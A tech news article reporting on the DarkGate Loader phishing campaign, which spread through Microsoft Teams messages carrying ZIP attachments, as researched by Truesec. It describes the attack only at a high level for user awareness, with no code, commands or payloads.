What you need to know
- Hackers are leveraging a new phishing campaign dubbed 'DarkGate Loader' to compromise Microsoft Teams accounts.
- The technique is designed to dupe unsuspecting users into downloading and opening .ZIP files marked 'Changes to the vacation schedule' onto their devices.
- The disguised download process uses Windows cURL, and the pre-compiled script makes it harder to spot the malware since the code is hidden.
Hackers are leveraging sophisticated techniques to dupe and lure unsuspecting users into their malicious attacks. Toward the end of August, Truesec's research team started investigating a new process dubbed 'DarkGate Loader.'
This phishing campaign sends seemingly harmless messages to Microsoft Teams users. The hackers used compromised Office 365 accounts to send messages with harmful attachments to unsuspecting users to trick them into downloading and opening ZIP files marked 'Changes to the vacation schedule.'
Trusec highlighted the hijacked accounts used by the hackers: "Akkaravit Tattamanas" (firstname.lastname@example.org) and "ABNER DAVID RIVERA ROJAS" (email@example.com), sending malicious VBScript lurking inside the LNK file which in turn deploys the malware known as DarkGate Loader.
The sophisticated campaign leveraged by the hackers makes it extremely difficult for users to detect foul play since the download process of the ZIP files makes use of a SharePoint URL. Moreover, the pre-compiled script makes it harder to detect the malware since the code is hidden in the middle of the file.
According to the research firm, the script can also identify whether the target user has Sophos, a popular antivirus, installed on their endpoinIfhat it's not installed, the additional code is unmasked, and shellcode is launched, which leverages a technique dubbed 'stacked strings' to construct the DarkGate executable and load it in the system memory.
It's not the only Teams-related scam, as a group of Russian hackers named Midnight Blizzard recently leveraged a new exploit that affected under 40 organizations in August. The hackers used previously compromised Microsoft 365 tenants belonging to small business owners to create new domains that purport to be technical support entities. However, Microsoft has since mitigated the issue and is currently investigating the attack's impact.
For now, you should remain vigilant to unexpected messages and alert your administrator if you identify this infected file.
Get the Windows Central Newsletter
All the latest news, reviews, and guides for Windows and Xbox diehards.
Kevin Okemwa is a seasoned tech journalist based in Nairobi, Kenya with lots of experience covering the latest trends and developments in the industry. With a passion for innovation and a keen eye for detail, he has written for leading publications such as OnMSFT, MakeUseOf, and Windows Report, providing insightful analysis and breaking news on everything revolving around the Microsoft ecosystem. While AFK and not busy following the ever-emerging trends in tech, you can find him exploring the world or listening to music.